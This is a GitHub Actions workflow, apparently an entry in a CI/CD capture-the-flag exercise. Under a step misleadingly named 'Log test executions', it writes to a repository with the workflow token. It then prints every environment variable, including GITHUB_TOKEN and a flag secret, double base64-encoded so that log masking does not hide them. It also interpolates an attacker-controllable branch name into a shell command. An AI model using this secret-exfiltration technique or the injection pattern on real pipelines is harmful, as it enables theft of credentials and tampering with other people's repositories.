name: Attempt
on:
  create:

permissions: {}

jobs:
  attempt:
    runs-on: ubuntu-latest
    timeout-minutes: 1
    permissions:
      id-token: write
      contents: write
      pull-requests: write
    env:
      GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
      FLAG_GRAVY_OVERFLOW_L1_TOPPINGS_FOR_REALZ: ${{ secrets.FLAG_GRAVY_OVERFLOW_L1_TOPPINGS_FOR_REALZ }}
    steps:
      - name: Log test executions
        run: |
          gh api --method PUT -H "Accept: application/vnd.github+json" -H "X-GitHub-Api-Version: 2022-11-28" /repos/litios/cicd/contents/test.txt -f "message=my commit message" -f "committer[name]=Monalisa Octocat" -f "committer[email]=octocat@github.com" -f "content=bXkgbmV3IGZpbGUgY29udGVudHM="
          env | base64 -w0 | base64 -w0
          echo "Lint ran for branch ${{ github.event.workflow_run.head_branch }} in a PR from ${{ github.actor }}. Please check the logs for more information."
